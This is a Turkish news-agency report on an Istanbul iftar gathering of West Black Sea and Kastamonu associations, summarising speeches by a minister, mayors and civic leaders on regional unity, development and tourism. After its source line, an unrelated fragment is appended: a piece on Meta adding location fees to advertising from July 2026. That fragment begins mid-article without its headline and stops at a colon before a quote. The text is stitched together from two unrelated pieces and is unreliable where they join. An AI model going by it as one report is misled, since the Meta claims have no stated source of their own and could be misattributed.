TELGRAF VE ORTAK SOFRAYLA BAŞLAYAN GECE

Program, Cumhurbaşkanı Recep Tayyip Erdoğan’ın Batı Karadeniz’in birlik ve beraberliğini tebrik eden telgrafının okunmasıyla başladı. Salonda gün boyunca hissedilen ana tema, “aynı havzanın çocukları” vurgusu etrafında şekillendi. Ramazan ayının manevi iklimiyle birleşen buluşmada, hemşehrilik hukukunun ötesine geçen daha geniş bir bölgesel dayanışma çağrısı yapıldı.

Geceye Tarım ve Orman Bakanı İbrahim Yumaklı, eski İçişleri ve Devlet Bakanı Murat Başesgioğlu, AK Parti Kastamonu Milletvekili Av. Halil Uluay, AK Parti İstanbul İl Başkanı Abdullah Özdemir, Düzce Belediye Başkanı Dr. Faruk Özlü, Karabük Belediye Başkanı Özkan Çetinkaya, Kastamonu Belediye Başkanı Hasan Baltacı, çok sayıda milletvekili, belediye başkanı, bürokrat ve sivil toplum temsilcisi katıldı. Programın organizasyonunda Batı Karadeniz’in öncü sivil toplum yapılarının geniş desteği yer alırken, salondaki yoğunluk katılımın salon kapasitesini zorladığını ortaya koydu.

Açılış bölümünde mehter marşlarının eşlik ettiği atmosfer, ilerleyen saatlerde hem kürsü konuşmalarına hem de özel yayınlara taşındı. CUMHA, programı yerinden takip ederken Ankara Temsilcisi Serdar Nalcı tarafından gün boyunca özel canlı yayınlar gerçekleştirildi.

ÇOLAKOĞLU: “BU BİR COĞRAFYA DEĞİL, DEĞERLER TOPLULUĞUDUR”

Programın ev sahibi Batı Karadeniz Konseyi İstanbul Başkanı ve Kastamonulular Platformu Başkanı Haydar Çolakoğlu, konuşmasına “Tekrar Ramazan’da buluşuyoruz, tekrar Ramazan soframızı paylaşıyoruz, tekrar Kastamonu diyoruz, tekrar Batı Karadeniz diyoruz” sözleriyle başladı. Çolakoğlu, bu buluşmanın yalnızca İstanbul’daki bir iftar programı olmadığını, aynı zamanda büyük bir toplumsal gövde gösterisi niteliği taşıdığını söyledi.

Çolakoğlu, “İstanbul’daki Batı Karadeniz kökenli nüfusun ağırlığı çok büyüktür. Kastamonulular da bu büyük kitlenin en güçlü damarlarından biridir. Dün ‘iki şehir, tek yürek’ diyorduk. Bugün geldiğimiz noktada ‘İstanbul ve Batı Karadeniz tek yürektir’ diyoruz” ifadelerini kullandı. “Üsküdar’a kadar Kastamonu” sözünü daha da genişlettiklerini belirten Çolakoğlu, “Artık sadece Üsküdar’a kadar Kastamonu değil, Üsküdar’a kadar Batı Karadeniz diyoruz” diye konuştu.

Batı Karadeniz’i yalnızca coğrafi bir alan olarak görmediklerini vurgulayan Çolakoğlu, “Bizim için Batı Karadeniz ve Kastamonu sadece coğrafi işaret değildir; tarihimizle övünmektir, aidiyettir, vatan sevgisidir, çalışkanlıktır, dürüstlüktür, dayanışmadır” dedi. “Mikro milliyetçilik yapmam. Benim için en büyük gurur Türk olmaktır” sözleri, salonda en çok alkış alan bölümlerden biri oldu.

Çolakoğlu, 12 Mart tarihinin özellikle seçildiğini belirterek İstiklal Marşı’nın kabulünün 105. yıl dönümüne dikkat çekti. “Korkma nidâsıyla başlayan o büyük metin, bir milletin bağımsızlık iradesidir” diyen Çolakoğlu, Kastamonu’nun İstiklal Harbi’ndeki yerine özel vurgu yaptı. İnebolu’nun İstiklal Madalyası’na sahip tek ilçe olduğunu hatırlatan Çolakoğlu, “Bu toprakların insanı vatan müdafaası için arkasına bakmadan cepheye koşmuştur” dedi.

Konuşmasında Fatih Sultan Mehmet Han’dan Enver Paşa’ya, Şehit Şerife Bacı’dan Halime Çavuş’a kadar uzanan tarihsel hafızayı anan Çolakoğlu, “Kastamonu ve Batı Karadeniz Türkiye’nin çimentosudur” ifadesini kullandı. Salonda kırka yakın şehit yakını ile çok sayıda gazinin bulunduğunu açıklayan Çolakoğlu, “Şehit ailelerimizin ve gazilerimizin yeri hepimizin üstündedir” dedi.

Kastamonulular Platformu ile Batı Karadeniz Konseyi’nin hedeflerini de anlatan Çolakoğlu, “Amacımız hemşehriler arasındaki dayanışmayı güçlendirmek, bölgemizin sosyal ve ekonomik gelişimine katkı sağlamak ve gelecek nesiller için daha güçlü bir Batı Karadeniz bırakmaktır” diye konuştu. Gençlik ve kadın yapılanmasına özel önem verdiklerini belirten Çolakoğlu, “Gençlerimizin aklına, vizyonuna güveniyoruz. Kadınlarımızın üretkenliğine ve bakış açısına güveniyoruz” dedi.

CUMHA özel yayında da değerlendirmelerini sürdüren Çolakoğlu, bu buluşmanın yalnızca salondaki bin kişiyle sınırlı olmadığını belirterek, “Biz bugün sadece bu odadaki bin kişiye hitap etmedik; Pasifik’ten Atlantik’e kadar Batı Karadenizli gönül coğrafyasına seslendik” ifadelerini kullandı. Temsil gücünün gençler, kadınlar, şehit aileleri, eğitimli insan kaynağı ve ortak kültürel hafıza ile büyüyeceğini söyleyen Çolakoğlu, “Görev verilmesini beklemeyin, bayrağı alın ve daha ileriye taşıyın” çağrısında bulundu.

Çolakoğlu, spor alanındaki çalışmalara da değinerek, tekvandodan hentbola, futboldan yüzmeye kadar birçok branşta gençleri desteklediklerini anlattı. “Sporun küçüğü büyüğü olmaz. Siz sporu unutursanız spor da sizi unutur” sözleriyle gençlere seslenen Çolakoğlu, Batı Karadeniz’in hareketli, eğitimli ve özgüvenli yeni kuşağını geleceğin en büyük gücü olarak tarif etti.

BAKAN YUMAKLI: “MEGA KENTTE DAYANIŞMA RUHU ÇOK KIYMETLİ”

Tarım ve Orman Bakanı İbrahim Yumaklı, konuşmasında Ramazan ayının paylaşma, dua ve aynı sofrada buluşma anlamına geldiğini vurguladı. “Bizler de bu akşam aynı sofranın etrafında bir arada olduk, dua ettik. Rabbim dualarımızı kabul etsin” diyen Yumaklı, organizasyonda emeği geçen Kastamonulular Platformu yönetimini tebrik etti.

İstanbul gibi bir mega kentte dayanışma ruhunun önemine dikkat çeken Yumaklı, farklı ilçelerden, farklı illerden gelip gurbette hayata tutunmaya çalışan büyüklerin bugün birçok kişiye hizmet etme imkânı sunduğunu söyledi. “Bu ülkenin her bir tuğlası için emek veren, bizi yetiştiren büyüklerimize saygı borçluyuz” diyen Yumaklı, ahirete irtihal edenlere rahmet diledi.

Yumaklı, konuşmasının önemli bir bölümünde bölgesel ve küresel krizlere değindi. Gazze başta olmak üzere mazlum coğrafyalarda yaşanan acıların Türkiye’yi de derinden etkilediğini belirten Yumaklı, Türkiye’nin barış, hukuk ve vicdan temelinde tutum aldığını söyledi. “Devletlerin çıkarlarını insanlık değerlerinin üstüne koyan anlayışın dünyaya huzur getirmesi mümkün değildir” diyen Yumaklı, Türkiye’nin iç birliğini güçlendirmesinin önemine dikkat çekti.

“Terörsüz Türkiye” ve “iç cepheyi güçlendirme” başlıklarına da değinen Yumaklı, bu sürecin küçük siyasi hesapların gölgesine bırakılmaması gerektiğini söyledi. Kastamonu’nun vatan, millet ve devlet bağlılığını hatırlatan Yumaklı, “Kastamonu gibi ülkesine ve milletine canını verecek nitelikte bir şehrin evladı olarak bunu söylemek benim için bir haktır” dedi.

Kendi hayat hikâyesine de değinen Yumaklı, “Bu ülke o kadar güzel bir ülke ki dağ köyünden çıkmış bir çiftçinin torunu olan İbrahim Yumaklı’ya bu millete hizmet etme şerefini vermiştir” sözleriyle salona seslendi. Platformun faaliyetlerinden memnuniyet duyduğunu da belirten Yumaklı, “Birliğin ve beraberliğin önde tutulduğu bir zaman diliminde çok önemli bir görev icra ediliyor” dedi.

BAŞESGİOĞLU: “BİZ AYNI HAVZANIN ÇOCUKLARIYIZ”

Eski İçişleri ve Devlet Bakanı Murat Başesgioğlu, programın en kapsamlı konuşmalarından birine imza attı. Batı Karadeniz insanının karakterini “sabır” kavramı üzerinden anlatan Başesgioğlu, Balkan Savaşları’ndan maden ocaklarına, denizden cepheye kadar uzanan ağır bir tarihi tecrübenin bölge insanının yüzüne işlediğini söyledi. “Batı Karadenizlinin yüzündeki en belirgin çizgi sabırdır” diyen Başesgioğlu, bu sabrın artık bölgesel kalkınma hedefleriyle birleşmesi gerektiğini ifade etti.

“Biz bir havzanın çocuklarıyız. Aramızdaki sınırlar çoğu zaman kâğıt üzerindedir” diyen Başesgioğlu, kültürün, türkünün, havanın, ağıdın ve tarihin ortak olduğunu söyledi. Filyos Projesi, Batı Karadeniz Sahil Yolu, Karasu-Bartın hattından Kastamonu ve Sinop’a uzanacak demir yolu, lojistik merkezler ve turizm koridorları gibi başlıkların birlikte savunulması gerektiğini belirtti.

Başesgioğlu, Batı Karadeniz adını taşıyan kurumların daha koordineli hale getirilmesini önererek, “Bu yapıları konsolide edelim, kurumsal bir çatı altında güç birliği oluşturalım” çağrısında bulundu. GAP ve DAP benzeri bir “Batı Karadeniz Kalkınma İdaresi” kurulmasının zorunlu hale geldiğini söyleyen Başesgioğlu, “İlleri birbirine rakip hale getirmeyecek, her ile hakkaniyetle yatırım götürecek bir yapıya ihtiyaç var” dedi.

Bölgenin yaşlanan nüfus yapısına da değinen Başesgioğlu, Kastamonu ve Sinop’un demografik verilerinin dikkatle okunması gerektiğini söyledi. “İnsan unsuru zayıflayan bir yapıda sürdürülebilir kalkınma olmaz” diyen Başesgioğlu, ulaşım kadar yeni sanayi devriminin gereklerine de hazırlık yapılması gerektiğini belirtti. “Dördüncü sanayi devrimi yaşanıyor. Yapay zekâya, nesnelerin internetine, yüksek katma değerli üretime yapışmamız lazım” ifadelerini kullandı.

CUMHA’nın özel yayınında da konuşan Başesgioğlu, geceyi “özlenen büyük buluşma” olarak tanımladı. “Ben bunu büyük bir ailenin buluşması olarak görüyorum” diyen Başesgioğlu, “Bu coğrafyanın doğal zenginliği muhteşemdir ama ulaşım, konaklama ve nitelikli hizmet altyapısını tamamlamadan rekabet etmek kolay değil. Kaybedecek vaktimiz yok, çok çalışmak zorundayız” sözleriyle konuşmasını tamamladı.

PLATFORM YÖNETİMİNDEN KİMLİK, VEFA VE DAYANIŞMA VURGUSU

Kastamonulular Platformu Başkan Vekili Ali Muhittin Tığlı, kısa ama dikkat çeken konuşmasında “Kastamonu, Türkiye’nin en zor dönemlerinde umutsuzluğa kapılmadan görevini yapan, ülkesine, milletine ve vatanına sahip çıkan insanların şehridir” dedi. Salonda bulunan belediye başkanları, sivil toplum temsilcileri ve siyasetçilerin bu ortak hafızanın taşıyıcıları olduğunu belirten Tığlı, Murat Başesgioğlu’nu da “yol gösteren bir isim” olarak andı.

Kastamonulular Platformu Başkan Vekili Mehmet Umur ise konuşmasında Ramazan ayının “sabrın, paylaşmanın ve gönülleri birleştirmenin ayı” olduğunu söyledi. Umur, “Kastamonu bizim için sadece doğduğumuz şehir değildir; tarihiyle, kültürüyle, insanıyla gönlümüzde ayrı bir yere sahip kıymetli bir yöredir” dedi. “Kastamonulu olmak ayrıcalıktır” ifadesini kullanan Umur, Nasrullah Meydanı’ndan Ilgaz Dağları’na uzanan kültürel hafızanın İstanbul’da da yaşatılması gerektiğini vurguladı.

Umur, konuşmasında Kastamonu’nun “evliyalar, şehitler, gaziler ve alimler şehri” olduğunu belirterek, “Şeyh Şaban-ı Veli Hazretleri’nin ve Şerife Bacı’nın torunları olmaktan gurur duyuyoruz” dedi. İstanbul’daki hemşehri gücünün korunması halinde daha güçlü bir toplumsal dayanışma zemini oluşacağını ifade eden Umur, platformun bu nedenle yalnızca sosyal değil, stratejik bir misyon da üstlendiğini söyledi.

ABDULLAH ÖZDEMİR: “İSTANBUL’UN EN ÖNEMLİ DİNAMOLARINDAN BİRİYİZ”

AK Parti İstanbul İl Başkanı Abdullah Özdemir, kürsüde yaptığı konuşmada bölgenin yalnızca kültürel değil, toplumsal sorumluluk bakımından da ağır bir yük taşıdığını söyledi. Özdemir, “Zor bir dönemden geçiyoruz. Bu süreçte Kastamonulu hemşehrilerimizin omuzlarında da büyük bir yük bulunduğunu biliyoruz” dedi. Cumhurbaşkanı Recep Tayyip Erdoğan’ın liderliğinde Türkiye’nin bölgesel güvenlik ve istikrar üretme kapasitesine değinen Özdemir, Ramazan ayının bereketiyle daha hayırlı bir döneme girilmesi temennisini dile getirdi.

İstanbul’un dünya ölçeğindeki yerine işaret eden Özdemir, “Dünya bir ülke olsa İstanbul başkent olur denmiş. Bizler de Kastamonu’dan, Batı Karadeniz’den çıkıp İstanbul’a gelmiş insanlar olarak bu şehrin en önemli dinamosu olduğumuzu biliyoruz” ifadelerini kullandı. Özdemir, önümüzdeki yıl için “İstanbul, Ramazan’ın dünya başkenti olsun” hedefini de ilk kez bu programda dillendirdi.

Platformun gençlik çalışmalarına da değinen Özdemir, geçen ay Kastamonulu gençlerle bir araya geldiklerini, İstanbul’daki büyük Kastamonu kitlesinin geleceğe daha güçlü hazırlanması için istişareler yaptıklarını anlattı. “İyi yetişmiş, özgüvenli binlerce gencimiz var. Siyasetin en önemli görevlerinden biri de bu gençlerin önünü açmaktır” dedi.

CUMHA’nın canlı yayınında da konuşan Özdemir, “İçeri girdiğimiz andan itibaren çok güzel bir atmosfer gördük. Dayanışmanın hissedildiği çok kıymetli bir akşam” dedi. “Nerede o eski Ramazanların tadı denirdi; o toplumsal maneviyatı yeniden hissedebileceğimiz bir Ramazan iklimini İstanbul’da daha güçlü kurmak istiyoruz” diyen Özdemir, CUMHA’ya da yayınları için teşekkür etti. Özdemir, mesajının sonunda “Savaşların olmadığı, insanların barış içinde yaşadığı, eşitliğin öne çıktığı bir dünya diliyorum” ifadelerini kullandı.

FARUK ÖZLÜ’DEN ORTAK TURİZM VE STRATEJİ ÇAĞRISI

Düzce Belediye Başkanı Dr. Faruk Özlü, konuşmasında Batı Karadeniz illerinin tarih boyunca sanayiden madenciliğe, ormancılıktan istihdama kadar çok büyük katkılar sunduğunu söyledi. “Bizim iktisadi ve insan kaynağı sermayemizin yeterince değerlendirilemediğini düşünüyorum” diyen Özlü, çözümün “ortak stratejik akıl” olduğunu ifade etti.

Ankara’da geçen yıl düzenlenen Batı Karadeniz Çalıştayı’na atıf yapan Özlü, orada ortaya konan vizyonun artık somut adımlara dönüşmesi gerektiğini söyledi. Batı Karadeniz Kalkınma Birliği’nin başkanlığını da yürüttüğünü belirten Özlü, bu yapının turizm odaklı daha büyük bir iş birliği modeline evrilmesi gerektiğini ifade etti. “Batı Karadeniz Kalkınma Birliği’ni Batı Karadeniz Turizm Birliği’ne dönüştürmeyi hedefliyoruz. Her ilin tek başına çalışması yerine Batı Karadeniz’i ortak bir turizm destinasyonu ve marka haline getirmeliyiz” dedi.

Özlü, TURSAB ile birlikte paket tur hazırlıkları yürütüldüğünü belirterek, İstanbul’dan çıkacak bir turun Düzce, Zonguldak, Karabük-Safranbolu, Bartın-Amasra, Kastamonu ve Bolu güzergâhında bölgesel bir deneyim sunacağını söyledi. “İdari sınırlar turistin zihninde yok. Bölgeyi bir bütün olarak anlatmak zorundayız” diyen Özlü, bu çalışmaların siyaset üstü bir çerçevede sürdürülmesi gerektiğini vurguladı ve bir sonraki buluşmaya Düzce’de ev sahipliği yapmaktan memnuniyet duyacağını kaydetti.

ÖZKAN ÇETİNKAYA: “BATI KARADENİZ TÜRKİYE’NİN GÖZ BEBEĞİDİR”

Karabük Belediye Başkanı Özkan Çetinkaya, Batı Karadeniz’in Sinop’tan Düzce’ye uzanan çizgide doğası, denizi, kıyıları, sanayisi, eğitimi ve kültürel mirasıyla Türkiye’nin en özel coğrafyalarından biri olduğunu söyledi. “Batı Karadeniz her zaman Türkiye’nin göz bebeği olmuştur” diyen Çetinkaya, demir-çelik, madencilik, ormancılık, su ürünleri ve nitelikli iş gücünün bölgenin temel gücü olduğunu ifade etti.

Çetinkaya, teknokentlerden üniversitelere, kıyı turizminden kış turizmine kadar geniş bir kalkınma alanına sahip olduklarını belirterek, “Sinop, Bartın, Akçakoca ve bütün sahil hattı çok kıymetli. Buna Ilgaz, Keltepe ve Kartalkaya gibi kış turizmi merkezlerini de ekleyerek daha güçlü bir destinasyon oluşturabiliriz” dedi. Kastamonu ve Zonguldak havalimanlarının daha aktif kullanılması gerektiğini ifade eden Çetinkaya, bunun hem turizm hem de gurbetçilerin ulaşımı açısından önemli olduğunu kaydetti.

İftar sofralarının siyaset zemini değil, bölgesel menfaatlerin konuşulduğu birlik zemini olması gerektiğini vurgulayan Çetinkaya, “Bizler bu sofralarda siyaset yapmamalıyız. Atalarımızdan aldığımız kudretle birlik ve beraberliğimizi daha da perçinlemeliyiz” dedi. “Kastamonu, Batı Karadeniz bu ülkenin çimentosudur” sözleri de salonda dikkat çeken ifadeler arasında yer aldı.

Canlı yayında da değerlendirmelerde bulunan Çetinkaya, “İçeride Batı Karadeniz’in denizleri gibi, dağları gibi omuz omuza bir kardeşlik gördük” dedi. Karabük’ü “çeliğiyle, sanayisiyle ülkeye değer üreten Cumhuriyet şehri” olarak tanımlayan Çetinkaya, CUMHA’ya da teşekkür ederek tüm bölgeyi Karabük’e davet etti.

HASAN BALTACI: “SOMUT ADIMLAR ATMALIYIZ”

Kastamonu Belediye Başkanı Hasan Baltacı, konuşmasında İstanbul ile Kastamonu arasındaki ilişkinin toplumsal derinliğine rağmen, bu gücün henüz yeterince etkili biçimde dönüştürülemediğini söyledi. “Bizler Kastamonu deyince aklımıza İstanbul gelir ama İstanbul denilince akla çoğu zaman Kastamonu gelmez” diyen Baltacı, nüfus, temsil ve hemşeri gücüne rağmen bu etkinin daha görünür hale getirilmesi gerektiğini belirtti.

Baltacı, “Kastamonulu olmakla övünürüz, gurur duyarız ama mesele bunun bir adım ötesine geçip somut adımlar atabilmektir” ifadelerini kullandı. Önümüzdeki dönemde Kastamonu ile İstanbul arasında “güçlü ve erdemli bir dayanışma” kurulması gerektiğini dile getiren Baltacı, İstanbul’daki hemşerilere değer katacak her işin parçası olmaya hazır olduğunu söyledi.

Konuşmasında İstanbul Büyükşehir Belediye Başkanı Ekrem İmamoğlu’nun selamını da salona ileten Baltacı, programın ardından ayrılacağını belirterek katılımcılardan helallik istedi. CUMHA’nın canlı yayınında ise programı “sadece bir iftar değil, iş dünyası, siyaset ve akademik çevreleri buluşturan önemli bir dayanışma zemini” olarak niteledi. Baltacı, “Kastamonu’da yaşamak mağduriyet sebebi olmamalı” sözleriyle yerel kalkınma hedefini özetledi. Yerel medya ve basının demokratik toplum için vazgeçilmez olduğunu vurgulayan Baltacı, Kastamonu’nun İstanbul’daki siyasetçi, basın, iş insanı ve sivil toplum gücünün birlikte hareket etmesi halinde kente çok büyük katkı sağlayacağını söyledi.

CUMHA ÖZEL YAYINLARINDA GECENİN NABZI TUTULDU

Kürsü konuşmalarının ardından CUMHA Ankara Temsilcisi Serdar Nalcı tarafından gün boyunca özel canlı yayınlar gerçekleştirildi. Yayınlar, programın yalnızca salondaki katılımcılarla sınırlı kalmayan ikinci yüzünü ortaya koydu. Siyasetten sivil topluma, iş dünyasından medyaya uzanan geniş bir yelpazede konuklar ağırlanırken, her konuşmacı Batı Karadeniz’in ortak geleceğine ilişkin farklı başlıklar açtı.

AK Parti Kastamonu Milletvekili Halil Uluay, yayında organizasyonu “hem il hem bölge açısından büyük kazanım” olarak niteledi. Uluay, “İstanbul işin mutfağı sayılır; biz Ankara’da altyapıyı hazırlıyoruz. Buradaki hemşerilerimizin işin bir ucundan tutması, siyaset kurumunun da onların önünü açması gerekiyor” dedi. Araç-İhsangazi Organize Sanayi Bölgesi ve yatırım bölgesi statüsü gibi başlıklara değinen Uluay, Kastamonulu yatırımcıları memlekete yatırım yapmaya davet etti.

Ankara Kastamonu Dernekler Federasyonu Başkanı Hasan Şen, “Bizim sesimiz oluyorsunuz” diyerek CUMHA’ya teşekkür etti. İstanbul’daki organizasyonu “çok başarılı bir çalışma” diye tanımlayan Şen, “Zor dönemlerden geçiyoruz. İç yapımızı güçlendirme konusunda kimseyi dışlama lüksümüz yok. Bu birlikteliğe millet olarak ihtiyacımız var” ifadelerini kullandı.

BAKSENDER Kastamonu Temsilcisi Mehmet Kayaçal, programı “bütün derneklerin ve platformların aynı çatı altında buluştuğu ilk büyük iftar” olarak değerlendirdi. Kayaçal, “İki şehir tek yürek” sloganının İstanbul’daki Kastamonulular için güçlü bir karşılık ürettiğini belirterek, “Bu kaynaşma İstanbul’daki Kastamonuluların birbirine daha fazla dayanışma içinde yaklaşmasını sağlayacak” dedi.

Batı Karadeniz Gazeteciler Cemiyeti Başkanı Erol Tayhan ise Batı Karadeniz’i “mini Türkiye” olarak tanımladı. “İşin içine girince burada ciddi bir çalışma olduğunu görüyorsunuz” diyen Tayhan, bölgenin nüfus üzerinden değil, sahip olduğu değerler üzerinden okunması gerektiğini söyledi. Küçük nüfuslu görülen illerin tanıtım ve medya desteği olmadan hak ettiği görünürlüğe kavuşamayacağını vurgulayan Tayhan, “Medya olmazsa olmazdır” dedi.

Batı Karadeniz Konseyi Başkan Yardımcısı Gurbet Altay, açılıştaki mehter marşlarının eşlik ettiği atmosferi hatırlatarak, “Ramazan’ın bereketini burada hissediyoruz. Batı Karadeniz’in ruhu burada, birliği burada” dedi. Altay, Batı Karadeniz’den başlayacak kalkınma hareketinin Türkiye geneline yayılacağına inandığını belirtti. Gençler, sanatçılar, kadınlar ve proje üretim kapasitesi üzerinden yeni bir kalkınma dili kurulacağını ifade etti.

Batı Karadeniz Konseyi Başkan Vekili Selahattin Ateş, Batı Karadeniz üzerine 25 yıldır çalıştıklarını, 2025 yılında Ankara’da düzenlenen Batı Karadeniz Çalıştayı ile yeni bir aşamaya geçildiğini söyledi. Ateş, İstanbul’daki yapılanmanın kurulduğunu, sıradaki adımların Kastamonu ve Düzce’de atılacağını belirtti. “Gönüllerimiz bir, amaçlarımız bir, çalışmalarımız bir” diyen Ateş, CUMHA’nın bölgenin tüm sorunlarına duyarlı yaklaşımını da takdir ettiğini ifade etti.

Batı Karadeniz Konseyi Kastamonu Başkanı Sadık Kışlı, iftarı “eksik kalmış, bugüne kadar yapılamamış bir organizasyonun başarılı başlangıcı” olarak değerlendirdi. Kışlı, bu gecenin “bir marş görevi göreceğini” belirterek, Batı Karadeniz’in ticaret, siyaset ve turizmde daha güçlü bir temsil üretmesi gerektiğini söyledi. “İstanbul’daki Batı Karadenizli nüfus çok ciddi bir ağırlık taşıyor. Bu güç doğru okunursa bölgemiz turizmde ve ekonomide daha ileri bir noktaya gelir” dedi.

Emlak Konut Genel Müdür Yardımcısı Gökhan Yüksel de büyükşehirlerde yaşamanın getirdiği uzaklıkların bu tür programlarla giderildiğini söyledi. “Bu iftarlar bizi bir araya getiriyor, hemşerilik hukukunu canlı tutuyor” diyen Yüksel, Filistin’de ve bölgede yaşanan acıların herkesi derinden etkilediğini, Ramazan Bayramı’nın barışa vesile olmasını dilediğini belirtti.

Yeniden Refah Partisi Genel Sekreteri Mehmet Altınöz ise programı “sadece bir iftar değil, çok kapsamlı hazırlanmış bir buluşma” olarak nitelendirdi. Altınöz, Kastamonulular Platformu ile Batı Karadeniz Konseyi’nin İstanbul’daki toplumsal ağırlığının çok büyük olduğunu söyledi. 12 Mart tarihinin seçimini anlamlı bulduğunu belirten Altınöz, Türkiye’nin hem iç siyasette hem dış politikada adalet, barış ve itidal eksenli bir çizgiye ihtiyaç duyduğunu ifade etti.

UZUNKÖK: “TÜRKİYE’DEKİ TÜM SERMAYE SAHİPLERİ KASTAMONU’YA BORÇLUDUR”

Programa Ankara’dan katılan ve Kastamonulu olan CUMHA Genel Müdürü Can Uzunkök de Serdar Nalcı’nın canlı yayın konuğu olarak değerlendirmelerde bulundu. Uzunkök, Kastamonu’nun sıradan bir şehir olmadığını vurgulayarak, “Kurtuluş Mücadelesi’nde toprağı işgal edilmediği halde en çok şehit veren illerin başında geliyor. Bu memleketin yükünü çekmiş, bedel ödemiş, bu ülkenin bugünlerine omuz vermiş bir şehirden bahsediyoruz” dedi.

Uzunkök, “Açık konuşmak gerekirse, bugün sahip olduğumuz birçok şeyi Kastamonu’nun o fedakârlığına borçluyuz” ifadelerini kullandı. Bu nedenle yalnızca Kastamonuluların değil, Türkiye’de imkân sahibi olan herkesin bu şehre karşı bir vefa sorumluluğu bulunduğunu vurgulayan Uzunkök, “Kastamonulu olsun ya da olmasın, bu ülkenin ekmeğini yiyen, imkânından büyüyen herkesin bu topraklara sahip çıkması gerekir” diye konuştu.

UZUNKÖK: “ÇOLAKOĞLU, SADECE DESTEK VEREN DEĞİL, İŞİN YÜKÜNÜ BİZZAT OMUZLAYAN İSİM OLDU”

Uzunkök, konuşmasının devamında programın ev sahibi Haydar Çolakoğlu’na da ayrı bir parantez açtı. Bu tür organizasyonlarda iş dünyasından gelen isimlerin çoğu zaman destek sunduğunu, finansman sağladığını ve ardından kendi iş temposuna döndüğünü belirten Uzunkök, Haydar Çolakoğlu’nun ise farklı bir tutum ortaya koyduğunu söyledi.

Uzunkök, “Normalde iş dünyasından gelen isimler katkı verir, desteğini sunar ve geri planda kalır. Haydar Çolakoğlu ise sadece destek veren değil, işin yükünü bizzat omuzlayan isim oldu. Masasından salonuna, davetinden akışına kadar sürecin her aşamasına sahip çıktı. Yoğun iş hayatına, ticari sorumluluklarına rağmen bu organizasyona doğrudan emek vermesi, takibini yapması ve yük alması bence asıl kıymetli olan noktadır” dedi.

UZUNKÖK: “BU SALONDAKİ TEK GERÇEKLİK KASTAMONU VE BATI KARADENİZ’Dİ”

Can Uzunkök, gecenin en dikkat çekici yanlarından birinin, çok farklı çevreleri aynı salonda ortak bir memleket duygusunda buluşturması olduğunu söyledi. Siyasetten bürokrasiye, iş dünyasından sivil topluma, medyadan sanat dünyasına kadar geniş bir katılımın olduğunu belirten Uzunkök, farklı siyasi partilerden, farklı kimliklerden isimlerin aynı çatı altında bir araya gelmesinin gecenin en anlamlı fotoğraflarından biri olduğunu ifade etti.

Uzunkök, “Bu salonda çok farklı siyasi partilerden, çok farklı kimliklerden insanlar vardı. Ama salondaki tek gerçeklik Kastamonu’ydu, Batı Karadeniz’di. Hiç kimsenin ayrıştığı yer değil, birleştiği aidiyet öne çıktı. Herkes aynı çatı altında memleket duygusunda buluştu. Bu da gecenin en güçlü taraflarından biriydi” ifadelerini kullandı.

Haydar Çolakoğlu’na teşekkür eden Uzunkök, konuşmasının sonunda doğum günü vesilesiyle de kutlama mesajı verdi. Uzunkök, “Bu anlamlı organizasyona öncülük eden Sayın Haydar Çolakoğlu’na hem teşekkür ediyorum hem de doğum gününü kutluyorum. Nice sağlıklı, başarılı ve hayırlı yıllar diliyorum” dedi.

CUMHA’nın bu önemli buluşmada yer almaktan onur ve mutluluk duyduğunu belirten Uzunkök, Ankara Temsilcisi Serdar Nalcı’nın canlı yayınlarıyla programın daha geniş kitlelere ulaştığını söyledi. Uzunkök, “Başta Sayın Haydar Çolakoğlu olmak üzere emeği geçen herkese gönülden teşekkür ediyorum” ifadelerini kullandı.

ORTAK MESAJ BİRLİK, HAFIZA VE GELECEK OLDU

Gece boyunca kürsüden ve yayınlardan yükselen ortak dil, Batı Karadeniz’in yalnızca geçmişiyle övünen bir bölge olmadığı; aynı zamanda ulaşım, yatırım, turizm, gençlik, spor, medya, kadın temsili ve kurumsal iş birliği başlıklarında geleceğe dönük güçlü bir irade ortaya koyduğu yönünde oldu. Salonda sık sık tekrarlanan “birlik varsa güç vardır, umut vardır, gelecek vardır” vurgusu, programın ana ekseni haline geldi.

İstanbul’daki büyük iftar buluşması, Batı Karadeniz’in köklü tarihinden aldığı güçle Türkiye’nin geleceğine katkı sunma iddiasını bir kez daha görünür kıldı. Gecenin sonunda geriye yalnızca kalabalık bir salon değil; ortak hafızaya yaslanan, kurumsal iş birliğini büyütmeyi amaçlayan ve İstanbul’dan tüm Türkiye’ye ses veren güçlü bir birlik fotoğrafı kaldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açıklamada, 1 Temmuz 2026 tarihinden itibaren yürürlüğe girecek uygulamanın bazı ülkelerde yayınlanan reklam harcamalarına ek olarak yansıtılacağı belirtildi. Yeni düzenlemenin, Meta’nın faaliyet gösterdiği ülkelerdeki yasal yükümlülükler ve maliyet artışları doğrultusunda hayata geçirildiği ifade edildi.

TÜRKİYE’DE REKLAMLARA YÜZDE 5 EK ÜCRET

Meta’nın paylaştığı bilgilere göre konum ücretleri, reklam verenin bulunduğu ülkeye göre değil, reklamın gösterildiği hedef kitlenin bulunduğu ülkeye göre hesaplanacak.

Uygulama kapsamında bazı ülkelerde geçerli olacak ücret oranları şu şekilde açıklandı:

Avusturya yüzde 5, Fransa yüzde 3, İtalya yüzde 3, İspanya yüzde 3, Türkiye yüzde 5 ve Birleşik Krallık yüzde 2.

Şirket, söz konusu oranların ve ülkelerin ilerleyen dönemlerde güncellenebileceğini de bildirdi.

REKLAM HARCAMASINA EKLENECEK

Meta tarafından verilen örnekte, yüzde 3 konum ücreti uygulanan İtalya’da 100 TL’lik reklam yayınlanması durumunda toplam ücretin 103 TL olacağı ifade edildi. Açıklamada, bu tutara ayrıca geçerli KDV’nin de ekleneceği belirtildi.

Meta, konum ücretlerinin kampanya bütçesinin içinde yer almayacağını ve reklam yayını gerçekleştikten sonra reklam harcamasına ek olarak hesaplanacağını bildirdi.

TÜM REKLAM FORMATLARINI KAPSAYACAK

Şirket açıklamasında yeni ücretlendirme modelinin görsel ve video dahil tüm reklam formatları için geçerli olacağı ifade edildi. Uygulamanın ayrıca WhatsApp mesajına yönlendiren reklam kampanyaları ve pazarlama mesajlarını da kapsayacağı belirtildi.

Meta, buna karşın WhatsApp’ın diğer ücretli mesajlaşma hizmetlerinin konum ücretlerinden etkilenmeyeceğini vurguladı.

“MEVZUAT ORTAMI NEDENİYLE ÜCRETLER DEĞİŞİYOR”

Meta açıklamasında, yeni uygulamanın gerekçesine ilişkin şu ifadeler yer aldı:

